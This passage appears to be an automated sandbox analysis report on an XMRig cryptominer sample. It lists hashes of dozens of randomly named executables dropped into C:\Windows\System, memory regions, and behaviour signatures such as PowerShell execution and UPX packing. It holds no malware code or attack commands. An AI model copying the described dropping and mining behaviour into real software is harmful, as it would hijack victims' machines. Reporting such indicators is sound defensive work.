MD5 b794692e3462c843711f64bb17b7f317
SHA1 184e8bf3532ac8e5b706c8dcff6926b66fcb4c2a
SHA256 98930052227f47b91785175314012f13c0b8c58f78f5cd3c7e29c4cac6844c5e
SHA512 a95893afa0913eb091bd1c78e3f17ff16949418706632c0e1b3154c53c34640177ba01af3ca0a2981404fb8df25a54ddad9c409288f6439c7e618ad4eb2c28a2

C:\Windows\System\pQBnhmq.exe

MD5 4c310df3728c4fb349486345c27a8270
SHA1 bdae44bb7b0336d7197cd213dc2bb33c0b65b65e
SHA256 2f4b538def7db9f8b3e40c722988a7f476e62d099d81aaa552064433e6967870
SHA512 5f5546dedb2b4769a2e25e4ef36896d70827e34e3350902fa906b7a7c533fd97cf05ffe81a8950e817b20dcfa06ea664db24761f29a98d36b6d90ce18afeb46d

C:\Windows\System\LUoxmgL.exe

MD5 0d9be099e2cb43622835fb4a50700c3b
SHA1 2e00e7f7a91d182221e422cbb5be36002d7e5c80
SHA256 392f4ea75315f3e51f79a9b819d720cc332466b2fe939f92db5069d3ccde40fc
SHA512 fc14842350df582b8f36596c9f2a54326d4f75e2e88bf7a92466c305efeef9b8caab16d6c24c7e4e34bf795c8b074840228e78c3740a1d9aebcd7fc82164403c

memory/1280-1110-0x00007FF7AA5A0000-0x00007FF7AA992000-memory.dmp

C:\Windows\System\gxqIXbk.exe

MD5 d650dcfc694c5a1a81f24701139a282a
SHA1 8837206621ab2466cf450eb50196108f413faa0b
SHA256 534ea5ef75183c2e4c1b1f3dc15ac3b17c49251e11e82125672c4425eac3ca65
SHA512 756e366e9da8ecdc041ec6249640ec646a472c8f3d5f641db661091de217528a391d7cb4435af7be281d180ec4019a3deafaac26ad283af232debb2aab2bd488

C:\Windows\System\geEXswD.exe

MD5 0c815391db7c04a36751ab8edce70194
SHA1 8666615ce464b8c3ba9b966307810130ce2e02c3
SHA256 6c1fdfe3610d0a0bc28c4f252cf8e9b08fef95fe9fc84ea10e644374c9677e17
SHA512 f5ebc1a88008ff98fe64f82ef77c48d876a56f05549a59e2c6ed2c4462acc16c7b7753117490ebfbeeddbf7c5b811cb80f05a720245a120d435ed72e6b507ba2

C:\Windows\System\DSvJLfo.exe

MD5 10f6f876eb2ec9efc8f7ad0b484e9272
SHA1 96cea3832a0893c33e5e591a0f9b811bb0985c26
SHA256 0afffc1d1af6ea8d47f23ba9ff53062dd20ab72e9f8064bacb6fe9562d79a97e
SHA512 f1b48d0ec0582a529a5bb94ede1dd17cccf84fb2e0ec17a68a61756e13a409f2af14d12209160d917b6bdb371806d0371ec25fa99cb5420ca86eaca7bda7d738

C:\Windows\System\glmuLZG.exe

MD5 a185c07fc102304a92f48ac1d165a3b7
SHA1 36a13e4fa51d78c93c6ec3844313d8a0f3f84b4a
SHA256 514bfe2fa708a1894a5cbe4a3593b9fc0aae8b1c938d57878ffb2434e98e89f5
SHA512 9501eb6e3138e33f79d1f6ae1e3755023564b088af9eb17bb10b394d156f2cc6061a138ebd7236c4ad0c33b361d898f5fe2a43fa8a100baf3c589b11fa12a6c5

memory/4816-168-0x00007FF645880000-0x00007FF645C72000-memory.dmp

C:\Windows\System\QkVyFyb.exe

MD5 c8bae5bcca1edefe219ac0c460470ad3
SHA1 fc2ba91174c6c0eba0a23eb0e6329300910f0e29
SHA256 129516ef979af121689974a0ec544a0912a799d781c89b361695fae92ebd96a8
SHA512 5bfa11cbf8fda1bd688bda95ca7ef34f210e921910aeac57aade6f99927e3cd4d1bc2c2e361ccfc95dcc3acb0134bddcf9907bf9e62a1ed31dfb763d942f882a

memory/4856-161-0x00007FF62B9D0000-0x00007FF62BDC2000-memory.dmp

C:\Windows\System\HMHAgcj.exe

MD5 b7cf48b0c531069e648183420543a443
SHA1 f1b352f36d1f28e220bdbdecab67a5199c7a7d0e
SHA256 9ee1edd6a32ac92d78e768613600e3242f8354d2cdaef9194b03e4146c2b84bf
SHA512 b9da14f196f1046a213c3c1f4644ba19a5799b5c77fa5e0cfb357447036aeeba8d0cf0b4ed52b4954702ddc4d9765bf19f2a804ab060db0ba1b9096cc17c9458

memory/1064-154-0x00007FF7DB900000-0x00007FF7DBCF2000-memory.dmp

memory/1604-151-0x00007FF6EB0A0000-0x00007FF6EB492000-memory.dmp

C:\Windows\System\uoFQlRv.exe

MD5 ecc2a3a127eb331a47579b79e3f8e8e5
SHA1 1df44ec58bda603dd22906e8458033b3f287f84e
SHA256 ac6af235905ddff1fe134d20a68708629e7395b1a0226fc054b84c63baeb55c7
SHA512 2b641437422268c360e8af8cb605acafd6736479aa4dbe9f33ee8cccd1e61c5a0e65e7d2f9f80c6100ab4be0b81d4109468dffa60fa75be0a22ef2f2f0abfabc

memory/4692-143-0x00007FF641960000-0x00007FF641D52000-memory.dmp

C:\Windows\System\xqNueVZ.exe

MD5 65922a62c847cee255a83421f6154ecc
SHA1 b1355204b53009e6653df7c1e9767a73018ffc01
SHA256 df49deee4352864452266d53d2059c182270ff5d765f3a7704036ff4edf59fc3
SHA512 edacb46d4b4a32d8eca024e3ab1d58b648567a0f44adc3760b0e86bd5f849fe80481d9798328ac30041fae3b76c16560ad584559f03167494bc11a6d88ab1995

memory/228-129-0x00007FF726FD0000-0x00007FF7273C2000-memory.dmp

memory/404-128-0x00007FF73DB80000-0x00007FF73DF72000-memory.dmp

C:\Windows\System\jLuZyni.exe

MD5 e238f874ee83e3bd91c97aba6e9039f3
SHA1 0eb795273a2b08b21b6571e59bfad02717e4492c
SHA256 811ae3506aea981075514357df1225e1c6d5c4a2d9d5531615922e43743d6b64
SHA512 eed2788538041ac1809fc3fa304b313b1220d547eea41a9dfd7c8b322f9fffc00d06dfbcac73afdbd1cf14df130f3da41e0269d8ab3934705aaa859a5a5fe32a

C:\Windows\System\srKygpS.exe

MD5 f2ac7fa1615ed977cf94d939450ecf47
SHA1 c8b20d252b72529ca76ce8f9ec9db0f53740933e
SHA256 a3f60c8cd2681a763055cb8d67adf228049bd820787e7e71437aced67d1a7389
SHA512 375546284a2b58dc460ff039809d7d73b2f926931455d21b38803b7e76de2c08b11bade3a9c8ec0f3d816cf094127f3dc98b3d53201e1763b054c74310603ecf

memory/4608-113-0x00007FF678460000-0x00007FF678852000-memory.dmp

memory/872-102-0x0000026A78F00000-0x0000026A796A6000-memory.dmp

memory/872-51-0x00007FFFFD8A0000-0x00007FFFFE361000-memory.dmp

memory/872-1661-0x00007FFFFD8A0000-0x00007FFFFE361000-memory.dmp

memory/872-2022-0x00007FFFFD8A3000-0x00007FFFFD8A5000-memory.dmp

memory/872-2024-0x00007FFFFD8A0000-0x00007FFFFE361000-memory.dmp

memory/5064-2041-0x00007FF75D470000-0x00007FF75D862000-memory.dmp

memory/4136-2043-0x00007FF7C7010000-0x00007FF7C7402000-memory.dmp

memory/4064-2042-0x00007FF7434F0000-0x00007FF7438E2000-memory.dmp

memory/3536-2279-0x00007FF68FF30000-0x00007FF690322000-memory.dmp

memory/4608-2280-0x00007FF678460000-0x00007FF678852000-memory.dmp

memory/404-2294-0x00007FF73DB80000-0x00007FF73DF72000-memory.dmp

memory/3872-2309-0x00007FF7C2000000-0x00007FF7C23F2000-memory.dmp

memory/1064-2313-0x00007FF7DB900000-0x00007FF7DBCF2000-memory.dmp

memory/4692-2312-0x00007FF641960000-0x00007FF641D52000-memory.dmp

memory/1604-2316-0x00007FF6EB0A0000-0x00007FF6EB492000-memory.dmp

memory/4856-2317-0x00007FF62B9D0000-0x00007FF62BDC2000-memory.dmp

memory/4816-2318-0x00007FF645880000-0x00007FF645C72000-memory.dmp

memory/3168-2327-0x00007FF6A8060000-0x00007FF6A8452000-memory.dmp

memory/3736-2329-0x00007FF662080000-0x00007FF662472000-memory.dmp

memory/3124-2331-0x00007FF7D4460000-0x00007FF7D4852000-memory.dmp

memory/372-2333-0x00007FF7BFA80000-0x00007FF7BFE72000-memory.dmp

memory/2896-2335-0x00007FF6668D0000-0x00007FF666CC2000-memory.dmp

memory/808-2337-0x00007FF692AC0000-0x00007FF692EB2000-memory.dmp

memory/1424-2344-0x00007FF7B6AB0000-0x00007FF7B6EA2000-memory.dmp

memory/3432-2347-0x00007FF735830000-0x00007FF735C22000-memory.dmp

memory/5064-2346-0x00007FF75D470000-0x00007FF75D862000-memory.dmp

memory/4956-2341-0x00007FF6DAFF0000-0x00007FF6DB3E2000-memory.dmp

memory/408-2340-0x00007FF775AD0000-0x00007FF775EC2000-memory.dmp

memory/4136-2353-0x00007FF7C7010000-0x00007FF7C7402000-memory.dmp

memory/4060-2352-0x00007FF63D480000-0x00007FF63D872000-memory.dmp

memory/4064-2350-0x00007FF7434F0000-0x00007FF7438E2000-memory.dmp

memory/3536-2355-0x00007FF68FF30000-0x00007FF690322000-memory.dmp

memory/228-2357-0x00007FF726FD0000-0x00007FF7273C2000-memory.dmp

memory/404-2359-0x00007FF73DB80000-0x00007FF73DF72000-memory.dmp

memory/4608-2361-0x00007FF678460000-0x00007FF678852000-memory.dmp

memory/3872-2363-0x00007FF7C2000000-0x00007FF7C23F2000-memory.dmp

memory/4692-2365-0x00007FF641960000-0x00007FF641D52000-memory.dmp

memory/1064-2401-0x00007FF7DB900000-0x00007FF7DBCF2000-memory.dmp

memory/4816-2404-0x00007FF645880000-0x00007FF645C72000-memory.dmp

memory/4856-2403-0x00007FF62B9D0000-0x00007FF62BDC2000-memory.dmp

memory/1604-2399-0x00007FF6EB0A0000-0x00007FF6EB492000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 13:49

Reported

2024-05-22 13:51

Platform

win7-20240508-en

Max time kernel

149s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\IQFfCth.exe N/A
N/A N/A C:\Windows\System\dRthmix.exe N/A
N/A N/A C:\Windows\System\wsVwhZx.exe N/A
N/A N/A C:\Windows\System\jsGJPoJ.exe N/A
N/A N/A C:\Windows\System\UWrullI.exe N/A
N/A N/A C:\Windows\System\VFePrpe.exe N/A
N/A N/A C:\Windows\System\IlXXiFS.exe N/A
N/A N/A C:\Windows\System\yHJffaT.exe N/A
N/A N/A C:\Windows\System\onNIwkp.exe N/A
N/A N/A C:\Windows\System\nLlrHaS.exe N/A
N/A N/A C:\Windows\System\CQeSpfA.exe N/A
N/A N/A C:\Windows\System\LQWCntI.exe N/A
N/A N/A C:\Windows\System\LaBKhzw.exe N/A
N/A N/A C:\Windows\System\ydKZEUK.exe N/A
N/A N/A C:\Windows\System\TVUgmGi.exe N/A
N/A N/A C:\Windows\System\jLuZyni.exe N/A
N/A N/A C:\Windows\System\BHZkard.exe N/A
N/A N/A C:\Windows\System\srKygpS.exe N/A
N/A N/A C:\Windows\System\rYtkDvr.exe N/A
N/A N/A C:\Windows\System\xqNueVZ.exe N/A
N/A N/A C:\Windows\System\ycDwHFp.exe N/A
N/A N/A C:\Windows\System\uoFQlRv.exe N/A
N/A N/A C:\Windows\System\HMHAgcj.exe N/A
N/A N/A C:\Windows\System\GyZTFQx.exe N/A
N/A N/A C:\Windows\System\QkVyFyb.exe N/A
N/A N/A C:\Windows\System\SKObWWE.exe N/A
N/A N/A C:\Windows\System\RsYOGdF.exe N/A
N/A N/A C:\Windows\System\glmuLZG.exe N/A
N/A N/A C:\Windows\System\DSvJLfo.exe N/A
N/A N/A C:\Windows\System\pQBnhmq.exe N/A
N/A N/A C:\Windows\System\LUoxmgL.exe N/A
N/A N/A C:\Windows\System\geEXswD.exe N/A
N/A N/A C:\Windows\System\gxqIXbk.exe N/A
N/A N/A C:\Windows\System\mHJgwgC.exe N/A
N/A N/A C:\Windows\System\lgeqSIa.exe N/A
N/A N/A C:\Windows\System\ScvXigm.exe N/A
N/A N/A C:\Windows\System\kZNzntD.exe N/A
N/A N/A C:\Windows\System\QoHGlYR.exe N/A
N/A N/A C:\Windows\System\xznFXir.exe N/A
N/A N/A C:\Windows\System\kdtEmjx.exe N/A
N/A N/A C:\Windows\System\ZTZAJFH.exe N/A
N/A N/A C:\Windows\System\DtBLSHv.exe N/A
N/A N/A C:\Windows\System\ReeOOlu.exe N/A
N/A N/A C:\Windows\System\leFjYMA.exe N/A
N/A N/A C:\Windows\System\VPXMlkt.exe N/A
N/A N/A C:\Windows\System\GhwdndH.exe N/A
N/A N/A C:\Windows\System\bDwRWIN.exe N/A
N/A N/A C:\Windows\System\txGCBbC.exe N/A
N/A N/A C:\Windows\System\ngcQWFK.exe N/A
N/A N/A C:\Windows\System\udqXNOw.exe N/A
N/A N/A C:\Windows\System\XMkfgGK.exe N/A
N/A N/A C:\Windows\System\tCciNBj.exe N/A
N/A N/A C:\Windows\System\EPwuAGi.exe N/A
N/A N/A C:\Windows\System\jODivET.exe N/A
N/A N/A C:\Windows\System\qPcxKLr.exe N/A
N/A N/A C:\Windows\System\GXCOoej.exe N/A
N/A N/A C:\Windows\System\xMxRYbM.exe N/A
N/A N/A C:\Windows\System\vnLqjoH.exe N/A
N/A N/A C:\Windows\System\OeoYgEa.exe N/A
N/A N/A C:\Windows\System\RMqnZkd.exe N/A
N/A N/A C:\Windows\System\nmllLwd.exe N/A
N/A N/A C:\Windows\System\QexJLhA.exe N/A
N/A N/A C:\Windows\System\JZSlpyC.exe N/A
N/A N/A C:\Windows\System\cFxuvpP.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\vgJiXzK.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\enwLAsh.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\vioJWUN.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\fEsdood.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\GJZefxs.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\aHSgjDs.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ebWlVKY.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\XKEziCi.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\XXcrfNb.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\rRoQVie.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\jTUdGBG.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\rLxeRoS.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\QqQGgnB.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\cLlryoO.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\rouHWGu.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\lOXnVoG.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\eeyUCpL.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\TneOxIs.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\bYpTCIk.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\dWSWQJF.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\dcTSpEk.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\enwccVO.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\JBYtKLT.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\lpstCxk.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\QZDtKcL.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\fhiwBvY.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\fEadaAZ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\otgOEKM.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\wIJcaOD.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\hPJhaix.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\LKJTgKg.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\JgvgGGn.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\gACirqQ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\OWRMvNJ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ZzuulPL.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\TVqtLUB.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\naFQNCg.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\BkkwOLD.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\CpVykzf.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\aqGgPWd.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\UefKcsW.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
